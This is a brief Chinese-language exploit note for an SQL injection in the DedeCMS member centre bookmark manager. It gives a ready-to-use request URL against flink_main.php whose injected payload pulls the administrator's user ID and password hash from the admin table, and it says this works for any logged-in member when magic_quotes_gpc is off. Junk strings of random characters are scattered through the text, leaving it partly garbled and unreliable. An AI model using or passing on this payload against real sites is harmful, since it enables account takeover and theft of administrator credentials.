DedeCMS会员中心SQL注射漏洞/ v' w/ h# V- U% B& h
需要magic_quotes_gpc = Off( W: J4 n/ o0 O, e4 M9 B
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
9 q6 U2 e$ j1 ]6 c 8 h" i) a- e4 Z; D; c$ G
DedeCMS会员中心书签管理SQL注射漏洞
6 J. M5 ], j$ q% Z% z成功利用该漏洞可获得管理员密码
9 K+ Y2 H a! e4 s/ R $ [' g" z. t& j$ L
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
7 c. O3 J, `8 ^$ z P
0 s. V8 r j- Z5 j( s3 U J6 H, e# c/ Ghttp://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r
% S$ `2 z8 s+ h& f6 p |